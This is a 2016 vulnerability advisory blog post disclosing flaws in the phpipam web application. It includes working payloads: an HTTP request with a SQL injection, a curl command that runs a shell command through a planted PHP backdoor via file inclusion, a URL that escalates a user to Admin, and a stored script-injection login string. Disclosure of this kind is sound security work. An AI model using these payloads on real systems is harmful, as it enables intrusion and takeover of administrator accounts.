JAHx163 - phpipam multiple vulnerabilities

Posted by Eldar Marcussen on 14/09/2016

These vulnerabilities were discovered by Eldar "Wireghoul" Marcussen

About

phpipam is an open-source web IP address management application. Its goal is to provide light and simple IP address management application. It is ajax-based using jQuery libraries, it uses php scripts and javascript and some HTML5/CSS3 features, so some modern browser is preferred to be able to display javascript quickly and correctly.

SQL injection

There are several cases of user supplied input used directly in SQL queries within this application allowing an attacker to divert the intended queries. The following post authentication example shows one of these:

POST /phpipam/app/tools/logs/show-logs.php HTTP/1.1
Host: 192.168.153.131
Content-Length: 81
Accept: */*
Origin: http://192.168.153.131
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.153.131/phpipam/?page=tools&section=logs
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: Cacti=p81i8ue3o6014otc235567bng5; phpipam=3a68bpm6a8hta2gvtudnio75q5

Notice=Notice&Warning=Warning&direction=n'"ext&lastId=1+union+select+@@version+--

Blind command injection

There are several cases of command injection in this application, however the most critical one is the insecure use of the subnetId parameter in the ./app/subnets/scan/subnet-scan-telnet.php file as this file does not check for authentication.

Local file inclusion

Local file inclusions are everywhere in this application, however one redeeming fact is that files must end with .php. A more permanent backdoor can be created by using the aforementioned command injection to create a .php file on the local file system. The following example shows how an unauthenticated attacker could execute a local file include attack on such a file (/tmp/pwnt.php):

curl 'http://host/phpipam/app/dashboard/widgets/index.php?section=../../../../../../../../tmp/pwnt&c=uname+-a'

Privilege escalation

The application implements a way for administrative users to impersonate other users of the application, presumably in order to test access or troubleshoot issues. However the authorisation implementation is broken into separate parts.

app/admin/users/index.php

# verify that user is logged in
$User->check_user_session();

// switch user
if(@$_GET['subnetId']=="switch"){
    $_SESSION['realipamusername'] = $_SESSION['ipamusername'];
    $_SESSION['ipamusername'] = $_GET['sPage'];
    print '<script>window.location.href = "'.create_link(null).'";</script>';
}

While this is an admin script, is only checks for valid user, and does not check permissions. This is included through a page that checks if current user is admin. The page cannot be accessed directly as it requires a $User object to be defined. However, when combined with the aforementioned local file inclusion it can be accessed as a non administrative user and allows setting the impersonated user to a user with higher privileges. Visiting the following url as a low privilege user will elevate privileges to the Admin account:

http://host/phpipam/?page=widgets&section=../../../app/admin/users/index&subnetId=switch&sPage=Admin

Cross Site Request Forgery

Every form is vulnerable to CSRF, no specific examples provided.

Bonus bug: Persistent Cross Site Scripting

Older copies of this application records failed login attempts in an unsafe manner and displays this log in a log widget on the homepage of administrative users and through the log interfaces. The following example shows a PoC which could easily be modified to trigger the creation of a new admin user when executed:

As an unauthorised user, attempt to login with username xss<script>alert(1)</script>ssx and any password
Login as an administrative user and observe the alert trigger.


Posted by Eldar Marcussen | Permanent link